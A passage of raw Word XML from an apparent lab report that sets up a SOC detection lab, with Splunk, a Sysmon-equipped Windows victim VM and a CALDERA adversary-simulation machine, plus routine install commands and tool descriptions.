        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Ready to receive logs from Windows Forwarder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="794434E8" w14:textId="4E28229C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="319" w:beforeAutospacing="off" w:after="319" w:afterAutospacing="off"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>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1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Windows VM (Victim Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="462E54DC" w14:textId="4A4C77DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Configured as main attack target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="32C84FD9" w14:textId="24CD23D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 Universal Forwarder installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="10930419" w14:textId="49917BE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Sysmon installed with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SwiftOnSecurity</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configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="68F65226" w14:textId="6012D385">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Logs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forwarded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to Splunk Indexer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="776C01A7" w14:textId="0AEB005C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="319" w:beforeAutospacing="off" w:after="319" w:afterAutospacing="off"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>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1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. CALDERA Attack Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4E20EC90" w14:textId="3FB863BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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CALDERA installed and configured</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3BCD891E" w14:textId="1C21262F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Can deploy agents and run adversary TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="24C366EF" w14:textId="3234396B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Supports MITRE ATT&amp;CK simulations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4E028BF7" w14:textId="3F6C75C5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="319" w:beforeAutospacing="off" w:after="319" w:afterAutospacing="off"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>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1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Network Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0784B499" w14:textId="55E59AFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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All machines on the same virtual network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1AA2FD71" w14:textId="4E98ED3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Communication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validated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00C6DD64" w14:textId="6E8C451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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Windows → Forwarder → Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="033E3EB7" w14:textId="31E26C47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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CALDERA → Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6840C644" w14:textId="6A756E95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Log pipeline tested successfully</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="26AE9BB9" w14:textId="0D912B94">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51D97CF8" w14:textId="205EA00D">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3. System Build Details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="072886AD" w14:textId="369C4143">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Windows VM Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="11951A33" w14:textId="14D73D72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Download Windows ISO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1B32C215" w14:textId="162D8FD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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VM specs: 4GB RAM, 2 CPU, 60GB disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="350727EB" w14:textId="599587F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Install Sysmon,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Sysinternals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Splunk Forwarder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="21ABE3C7" w14:textId="580AC386">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Defender disabled only for testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="68F7A31F" w14:textId="3DD54ECE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Install Sysmon: sysmon.exe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accepteula</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sysmon.xml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="3B18962A" w14:textId="28DD5912">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6FA15CB9" w14:textId="0B189D6C">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Ubuntu Server Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="365417B2" w14:textId="445487BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Install Ubuntu Server ISO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6081066C" w14:textId="2492BF49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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VM specs: 4GB RAM, 2 CPU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6D398E6C" w14:textId="67835C73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Update system:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4AE32FE0" w14:textId="6D20BC28">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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sudo</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apt update &amp;&amp;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sudo</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apt upgrade -y</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="00EB33A2" w14:textId="76FD06E5">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719133E2" w14:textId="772338D3">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Splunk Installation (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5D1C10FE" w14:textId="46C76E9E">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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wget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splunk.deb</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hyperlink r:id="R0cde8723899b4c88">
        <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://download.splunk.com/products/splunk/releases/9.2.0/linux/splunk-9.2.0.deb</w:t>
        </w:r>
      </w:hyperlink>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sudo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dpkg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splunk.deb</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sudo /opt/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/bin/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start --accept-license</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sudo /opt/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/bin/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enable boot-start</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="66CC8B2C" w14:textId="69DC8F33">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strike w:val="0"/>
          <w:dstrike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Access via:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://&lt;19</w:t>
        </w:r>
        <w:r w:rsidRPr="166587AE" w:rsidR="72B7131E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>2.168.23.133</w:t>
        </w:r>
        <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>&gt;:8000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6F223A35" w14:textId="42B661DD">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253309E5" wp14:anchorId="133934A3">
            <wp:extent cx="5943600" cy="3000375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6970023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7002356" name="Picture 697002356"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1466897067">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3000375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3C095B84" w14:textId="534691D5">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Splunk Universal Forwarder (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="51ED8CFA" w14:textId="556AD216">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Install MSI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3A70D55A" w14:textId="31657B4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Configure Splunk Server (port 9997)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="195802A2" w14:textId="56F1BA38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Collect: Security Logs, Sysmon, PowerShell Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="160D21BC" w14:textId="5559BFC4">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="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br/>
      </w:r>
      <w:r w:rsidR="282F2B94">
        <w:drawing>
          <wp:inline wp14:editId="250AD7B2" wp14:anchorId="21B90E22">
            <wp:extent cx="5943600" cy="4676775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6344676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4467638" name="Picture 634467638"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1904983957">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4676775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1DF5E9BB" w14:textId="2627E117">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CALDERA Installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2883D23A" w14:textId="72833D2F">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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git clone </w:t>
      </w:r>
      <w:hyperlink r:id="R6f34d022ba0c48a7">
        <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/mitre/caldera.git</w:t>
        </w:r>
      </w:hyperlink>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--recursive</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cd caldera</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pip3 install -r requirements.txt</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python3 server.py --insecure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="77A5DB5C" w14:textId="4812F6C7">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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Access UI:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="R70246377e5164804">
        <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://localhost:8888</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="3FE6F8B8" w14:textId="0126E175">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166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="1A365CB7" w14:textId="4A94BEC4">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65CECF71" w14:textId="7D4EADCE">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6370586A" wp14:anchorId="4BD42D17">
            <wp:extent cx="5943600" cy="4391025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15776280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7628072" name="Picture 1577628072"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId94596748">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4391025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="224A3159" w14:textId="24D47905">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7F8DC6AE" wp14:anchorId="31516B53">
            <wp:extent cx="5943600" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16327101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2710183" name="Picture 1632710183"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId385605370">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3181350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="05668B6D" w14:textId="18D10F3E">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4. Tool Roles in Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3E935D81" w14:textId="3153A363">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Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3950BA05" w14:textId="0F969327">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Collects process, network, registry, and PowerShell events</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2AD9E3F1" w14:textId="29DBDEFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Provides detailed attacker telemetry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="49AD2A49" w14:textId="1561453D">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Splunk Universal Forwarder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4488C268" w14:textId="63EBEF43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Sends Sysmon + Windows logs to Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="44695AA1" w14:textId="2A5FE92B">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Splunk Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3860367E" w14:textId="5406CAEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Central SIEM for indexing, detection, dashboards, and alerts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="09392276" w14:textId="76E62E8C">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CALDERA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2FA9755B" w14:textId="1508A531">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Executes realistic adversary simulations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1EEB0E4E" w14:textId="4CEED539">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Generates logs for SOC investigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="5F774F41" w14:textId="07848D00">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7459DFC3" w14:textId="5858B9E7">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5. Integrated Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="47ADCA34" w14:textId="5FE7E6F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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CALDERA launches simulated attack</w:t>
      </w:r>
    </w:p>
